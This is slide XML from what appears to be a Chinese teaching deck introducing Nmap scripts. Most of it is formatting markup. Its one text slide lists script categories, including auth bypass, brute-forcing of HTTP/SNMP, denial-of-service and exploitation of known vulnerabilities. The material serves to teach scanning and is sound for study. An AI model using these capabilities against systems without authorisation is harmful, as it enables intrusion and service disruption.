              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>显示关于脚本的帮助</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>namp脚本介绍</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4592955" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.3.1 namp脚本介绍</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2999740" y="1625600"/>
            <a:ext cx="8827135" cy="4523105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2. nmap脚本主要分为以下几类，在扫描时可根据需要设置- -script=类别这种方式进行比较简单的扫描。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>auth		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>负责处理鉴权证书（绕开鉴权）的脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>broadcast	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在局域网内探查更多服务开启状况,如 DHCP/DNS/SQL Sever等服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>brute		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>提供暴力破解方式，针对常见的应用如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Http/SNMP等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>default		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>使用-sC或-A选项扫描时默认的脚本，提供基本脚本扫描能力</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>discovery	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对网络进行更多的信息，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>SMB枚举、SNMP查询等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>dos		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>用于进行拒绝服务攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>exploit		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>利用已知的漏洞入侵系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>external	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>利用第三方的数据库或资源，如进行whois解析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fuzzer		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>模糊测试的脚本，发送异常的包到目标机，探测出潜在漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>intrusive	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>入侵性的脚本，此类脚本可能引发对方的IDS/IPS的记录或屏蔽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>malware		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>探测目标机是否感染了病毒、开启了后门等信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>safe		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>此类与intrusive相反，属于安全性脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>version		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>负责增强服务与版本扫描（Version Detection）功能的脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>vuln		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>负责检查目标机是否有常见的漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> Vulnerability)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786245" y="6761480"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4592955" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.3.1 namp脚本介绍</a:t>
